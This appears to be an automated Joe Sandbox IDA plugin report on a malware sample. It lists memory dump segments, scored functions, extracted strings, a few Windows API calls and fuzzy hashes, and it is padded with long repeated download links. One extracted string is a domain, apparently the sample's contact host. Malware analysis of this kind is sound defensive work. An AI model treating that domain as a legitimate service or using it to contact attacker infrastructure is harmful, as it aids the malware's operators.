Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: String$Free$AllocBlanketInformationProxyVolume
String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
API String ID: 1773362589-1335595022
Opcode ID: 6de487b39d5c65841fec8d42e6daa7c7768c22c95bba2e850de5f73c83ea806c
Instruction ID: 2012f01bc2b352bfb4dabdf2420d26e5a57234283c1151a5f3b7a224c780a168
Opcode Fuzzy Hash: 6de487b39d5c65841fec8d42e6daa7c7768c22c95bba2e850de5f73c83ea806c
Instruction Fuzzy Hash: 63221276A083519BD310CF28C881B5BBBE2EFC5324F19892CE9D49B391D7B5D845CB82

Function 00F0B100 Relevance: 20.4, Strings: 16, Instructions: 425
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

k=W?, xrefs: 00F0B23F
D!M#, xrefs: 00F0B1F9
Gu@w, xrefs: 00F0B2CB
XyR{, xrefs: 00F0B2D5
Gq\s, xrefs: 00F0B2C1
Ym]o, xrefs: 00F0B2B7
pE}G, xrefs: 00F0B253
9]_, xrefs: 00F0B28F
hI2K, xrefs: 00F0B25D
}KcU, xrefs: 00F0B6DF
S%U', xrefs: 00F0B203
zMzO, xrefs: 00F0B267
b6j4, xrefs: 00F0B57D
yQrS, xrefs: 00F0B271
(Y6[, xrefs: 00F0B285
.AtC, xrefs: 00F0B249

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO$}KcU
API String ID: 0-18744084
Opcode ID: 1640c0c83d0eb81707d16a19abdd29d5cd6f42648e430b4b910826bb936c9efc
Instruction ID: 239bfcaff752665ccbae4c8ade2f8490446f76982fa5793b1b5a26cb09145f27
Opcode Fuzzy Hash: 1640c0c83d0eb81707d16a19abdd29d5cd6f42648e430b4b910826bb936c9efc
Instruction Fuzzy Hash: 920266B5200B05CFD324CF25D891BABBBF1FB45314F108A2CD9AA8BAA1D775A444EF50

Function 00F38EA0 Relevance: 15.3, Strings: 12, Instructions: 287
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

], xrefs: 00F39196
_, xrefs: 00F3918C
\, xrefs: 00F38F4B
^, xrefs: 00F38F41
_, xrefs: 00F38F3C
], xrefs: 00F3905E
\, xrefs: 00F39063
_, xrefs: 00F39054
\, xrefs: 00F3919B
^, xrefs: 00F39191
^, xrefs: 00F39059
], xrefs: 00F38F46

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: \$\$\$]$]$]$^$^$^$_$_$_
API String ID: 0-1108506012
Opcode ID: 03fb5d8ffa0ec44dcfb390d7632ee0bb4c5854c47c032d5a98c3bd1a778de9d3
Instruction ID: 2803278c28f2285c92d4c9a4f854f7cd8b6194eeba4fb613b32b35e17b110bee
Opcode Fuzzy Hash: 03fb5d8ffa0ec44dcfb390d7632ee0bb4c5854c47c032d5a98c3bd1a778de9d3
Instruction Fuzzy Hash: 14B1E47264C7848BD3149A28CC8436BBBD29BD6334F1D4B2DE5A9473C2C6F9C885A746

Function 00F239B9 Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 822
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

eN, xrefs: 00F241BA
#E#G, xrefs: 00F23D1C
rp, xrefs: 00F23FF3
_^]\, xrefs: 00F23865
+A#C, xrefs: 00F23D15
=]=_, xrefs: 00F23D0E

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: #E#G$+A#C$=]=_$_^]\$eN$rp
API String ID: 0-3333364358
Opcode ID: 13f348dd3b8d6520c195d7a2d7ccc1e927f2082242857247a0201624df68a1c2
Instruction ID: 4cff1faa7f55b4408434964b77220b1ab31687118d4124ebf93b20898a9bfc8f
Opcode Fuzzy Hash: 13f348dd3b8d6520c195d7a2d7ccc1e927f2082242857247a0201624df68a1c2
Instruction Fuzzy Hash: 274277B5A04215CFDB14CF28D8816AABBB2FF8A310F1981ACD8459F395D738D942DBD1

Function 00F23B50 Relevance: 12.8, APIs: 2, Strings: 5, Instructions: 600
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00F23C37
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00F23CB1

Strings

eN, xrefs: 00F241BA
#E#G, xrefs: 00F23D1C
rp, xrefs: 00F23FF3
+A#C, xrefs: 00F23D15
=]=_, xrefs: 00F23D0E

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: #E#G$+A#C$=]=_$eN$rp
API String ID: 237503144-3451580660
Opcode ID: bbf0bef6bd6a65f1b5a0aa1a43220c9de60b5ed2c362304c45dcd05bb8949fb1
Instruction ID: e122e1b59618afa6f87bcdce99f018d07d5ca376a8701db96dc862b82f595df4
Opcode Fuzzy Hash: bbf0bef6bd6a65f1b5a0aa1a43220c9de60b5ed2c362304c45dcd05bb8949fb1
Instruction Fuzzy Hash: 041236B5E00215CFDB14CF69D8826AABBB2FF85310F1981A8D845AF355D7389902DBD1

Function 00F0CE45 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 342
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 00F0CE56

Strings

lev-tolstoi.com, xrefs: 00F0D266
6=.), xrefs: 00F0CF3B
<1!9, xrefs: 00F0CF34
`{tu, xrefs: 00F0D1A8

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
